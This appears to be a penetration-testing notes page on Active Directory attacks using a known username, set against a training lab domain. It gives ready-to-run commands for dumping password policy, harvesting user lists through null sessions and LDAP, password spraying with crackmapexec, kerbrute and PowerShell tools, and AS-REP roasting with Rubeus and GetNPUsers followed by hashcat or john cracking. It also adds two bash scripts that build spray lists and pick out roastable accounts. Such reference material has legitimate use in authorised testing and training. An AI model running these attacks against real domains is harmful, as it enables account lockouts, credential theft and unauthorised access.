# With Username

## Get the password policy

{% hint style="info" %}
Dumping the password policy normally needs a valid credential (a null session sometimes works, see the rpcclient tab). Read it before you spray: the lockout threshold and the observation window decide how many passwords you can try per account without locking users out.
{% endhint %}

{% tabs %}
{% tab title="crackmapexec" %}

```
cme smb <ip> -u "user" -p "password" --pass-pol
```

{% endtab %}

{% tab title="enum4linux" %}

```
enum4linux -u "user" -p "password" -P <ip>
```

{% endtab %}

{% tab title="rpcclient" %}

```
# Null session; if the DC refuses it, use -U "user%password" instead of -N.
# getdompwinfo only returns the minimum length and complexity flags; for the
# lockout threshold and window use the crackmapexec or enum4linux tab.
rpcclient -U "" -N <ip>
rpcclient $> getdompwinfo
```

{% endtab %}

{% tab title="ldapsearch" %}
{% code overflow="wrap" %}

```
ldapsearch -H ldap://172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
```

{% endcode %}
{% endtab %}

{% tab title="PowerView" %}

```
Import-Module .\PowerView.ps1
Get-DomainPolicy
# Just the password/lockout section (LockoutBadCount, ResetLockoutCount, MinimumPasswordLength, ...)
(Get-DomainPolicy)."SystemAccess"
```

{% endtab %}

{% tab title="Windows Tools" %}

```
net accounts          # policy of the local machine
net accounts /domain  # the domain policy, read from a DC
```

{% endtab %}
{% endtabs %}

## Making a Target User List

{% tabs %}
{% tab title="enum4linux" %}

```
enum4linux -U 172.16.5.5  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
```

{% endtab %}

{% tab title="rpcclient" %}

```
rpcclient -U "" -N 172.16.5.5 -c "enumdomusers" | cut -d'[' -f2 | cut -d']' -f1
```

{% endtab %}

{% tab title="crackmapexec" %}

```
cme smb 172.16.5.5 -u '' -p '' --users   # null session
```

```
sudo cme smb 172.16.5.5 -u user -p password --users
```

{% endtab %}

{% tab title="ldapsearch" %}
{% code overflow="wrap" %}

```
# objectCategory=person excludes computer accounts, which are also objectClass=user
ldapsearch -H ldap://172.16.5.5 -x -b "DC=domain,DC=LOCAL" -s sub "(&(objectCategory=person)(objectClass=user))" sAMAccountName | grep sAMAccountName: | cut -f2 -d" "
```

{% endcode %}
{% endtab %}

{% tab title="windapsearch" %}

```
./windapsearch.py --dc-ip IP -u "" -U
```

{% endtab %}

{% tab title="kerbrute" %}

```
# Kerberos-based: does not count against lockout and leaves no 4625, but each probe
# is a 4768 on the DC when Kerberos authentication auditing is enabled
kerbrute userenum -d domain --dc IP wordlist.txt
```

{% endtab %}
{% endtabs %}
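The tools above return names in different shapes (`user:[name] rid:[...]`, `sAMAccountName: NAME`, `DOMAIN\user`, UPNs), and spraying the same account twice under two spellings wastes lockout budget. The following is an added example, not code from the original page: it merges such output into one clean list. `RAW_SAMPLE` is constructed input standing in for the concatenated output of the commands above; the set of built-in names it drops is a choice of this example.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): merge harvested user names into
# one spray list. RAW_SAMPLE is constructed input mixing the enum4linux,
# ldapsearch, DOMAIN\user and UPN forms that concatenating tool output produces.
set -u

RAW_SAMPLE='user:[Administrator] rid:[0x1f4]
user:[krbtgt] rid:[0x1f6]
user:[jsmith] rid:[0x45b]
sAMAccountName: JSMITH
sAMAccountName: DC01$
sAMAccountName: svc_backup
INLANEFREIGHT\bjones
bjones@inlanefreight.local

Guest'

# build_user_list: stdin -> one lowercase, de-duplicated sAMAccountName per line.
# Drops machine accounts (trailing $) and built-ins that only cost you noise or a
# lockout (krbtgt cannot log on interactively; guest is normally disabled).
build_user_list() {
    sed -E \
        -e 's/^user:\[([^]]+)\].*/\1/' \
        -e 's/^sAMAccountName: *//' \
        -e 's/^[^\\]+\\//' \
        -e 's/@.*$//' \
    | tr -d '\r' \
    | tr '[:upper:]' '[:lower:]' \
    | grep -vE '^[[:space:]]*$|\$$' \
    | grep -vE '^(krbtgt|guest|defaultaccount)$' \
    | sort -u
}

# Stand-alone demo; in the field: cat enum4linux.out ldap.out kerbrute.out | build_user_list > valid_users.txt
printf '%s\n' "$RAW_SAMPLE" | build_user_list
```

Feed it the raw output files of as many of the tabs as you ran; the result is the `valid_users.txt` the spraying commands expect. Keep `Administrator` in the list only if you intend to test it: on many domains it is exempt from lockout, on others it is the account whose lockout gets noticed first.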

## Password Spraying

{% tabs %}
{% tab title="crackmapexec" %}

```
# --continue-on-success keeps going after the first hit instead of stopping at one valid login
sudo cme smb 172.16.5.5 -u valid_users.txt -p Password123 --continue-on-success | grep +
```

{% endtab %}

{% tab title="kerbrute" %}

```
kerbrute passwordspray -d domain --dc DCIP valid_users.txt Password
```

{% endtab %}

{% tab title="sprayhound" %}

```
sprayhound -U <users.txt> -d <domain> -dc <dc-ip>
```

{% endtab %}

{% tab title="rpcclient" %}
{% code overflow="wrap" %}

```
while read -r u; do rpcclient -U "$u%<password>" -c "getusername;quit" <dc-ip> | grep Authority; done < valid_users.txt
```

{% endcode %}
{% endtab %}

{% tab title="Windows" %}

```
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Password -OutFile spray_success -ErrorAction SilentlyContinue
```

[Spray-Passwords.ps1](https://web.archive.org/web/20220225190046/https://github.com/ZilentJack/Spray-Passwords/blob/master/Spray-Passwords.ps1)

```
.\Spray-Passwords.ps1 -Pass <PASSWORD> -Admin
```

{% endtab %}
{% endtabs %}

## ASREPRoast

{% tabs %}
{% tab title="Step 1" %}
**Identify accounts that have the "Do not require Kerberos preauthentication" option enabled.**

**Kerbrute**

```
# Probes the list over Kerberos; for accounts without preauth kerbrute also dumps the AS-REP hash
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt
```

**PowerView**

```
Get-DomainUser -PreauthNotRequired -Properties SamAccountName
```

{% endtab %}

{% tab title="Step 2" %}
**Exploit AS-REP Roasting to extract password hashes.**

**Rubeus.exe**

```
# Without /user: Rubeus roasts every account that has preauth disabled
.\Rubeus.exe asreproast /user:username /format:hashcat /outfile:hash.txt
```

**Get-NPUsers**

```
# Authenticated: enumerates every account with preauth disabled and requests its AS-REP
impacket-GetNPUsers <domain>/<user> -dc-ip <ip> -request -format hashcat -outputfile <file_name>

# Unauthenticated: needs a user list; only roastable names come back with a hash
GetNPUsers.py domain/ -usersfile users.txt -dc-ip <ip> -format hashcat -request
```

{% endtab %}

{% tab title="Step 3" %}
**Crack hashes for plaintext passwords.**

**john**

```
# john wants its own hash layout: produce it with -format john / /format:john
.\john.exe hash.txt --format=krb5asrep --wordlist=wordlist
```

**hashcat**

```
hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt 
```

{% endtab %}
{% endtabs %}
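Step 1 above shows kerbrute and PowerView; with only LDAP access you can find the same accounts yourself, because "Do not require Kerberos preauthentication" is the `DONT_REQ_PREAUTH` bit (0x400000, decimal 4194304) of `userAccountControl`. The script below is an added example, not code from the original page: it filters an LDIF dump for that bit and skips disabled accounts (`ACCOUNTDISABLE`, 0x2), whose AS-REQ the KDC rejects so they yield nothing to crack. `LDIF_SAMPLE` is constructed; the `ldapsearch` line in the comment is the query that would produce such input.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): select AS-REP-roastable accounts from
# an LDAP dump. LDIF_SAMPLE is constructed; live input would come from e.g.
#   ldapsearch -H ldap://<dc-ip> -x -b "DC=domain,DC=local" \
#     "(&(objectCategory=person)(objectClass=user))" sAMAccountName userAccountControl
set -u

LDIF_SAMPLE='dn: CN=John Smith,CN=Users,DC=inlanefreight,DC=local
sAMAccountName: jsmith
userAccountControl: 4260352

dn: CN=svc_backup,CN=Users,DC=inlanefreight,DC=local
sAMAccountName: svc_backup
userAccountControl: 66048

dn: CN=svc_legacy,CN=Users,DC=inlanefreight,DC=local
sAMAccountName: svc_legacy
userAccountControl: 4194816

dn: CN=oldsvc,CN=Users,DC=inlanefreight,DC=local
sAMAccountName: oldsvc
userAccountControl: 4260354'

# preauth_not_required: LDIF on stdin -> sAMAccountName of every enabled account with
# DONT_REQ_PREAUTH (0x400000) set. Bits are tested with integer division so the
# script also runs on mawk/BSD awk, which lack gawk's and() builtin.
preauth_not_required() {
    awk '
        function bit(v, b) { return int(v / b) % 2 }
        function flush() {
            if (name != "" && uac != "" && bit(uac, 4194304) == 1 && bit(uac, 2) == 0)
                print name
            name = ""; uac = ""
        }
        /^sAMAccountName:/     { name = $2 }
        /^userAccountControl:/ { uac = $2 + 0 }
        /^$/                   { flush() }
        END                    { flush() }
    '
}

# Stand-alone demo: jsmith (0x410200) and svc_legacy (0x400200) qualify;
# svc_backup lacks the bit and oldsvc (0x410202) is disabled.
printf '%s\n' "$LDIF_SAMPLE" | preauth_not_required
```

The names it prints are exactly the `-usersfile` input GetNPUsers needs in the unauthenticated case, and the same bit test is what the server does for the filter `(userAccountControl:1.2.840.113556.1.4.803:=4194304)` if you prefer to let LDAP do the filtering.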

To crack any hash recovered this way, see:

[hash-cracking](https://m4rcg04m.gitbook.io/m4rcg04m/notes/explotation/password-attacks/hash-cracking "mention")

<figure><img src="https://2861405377-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjlU2uTByjgI9M2B6y0iJ%2Fuploads%2Fgit-blob-1409fe636434f812ad131428a48b8b104599aa69%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>
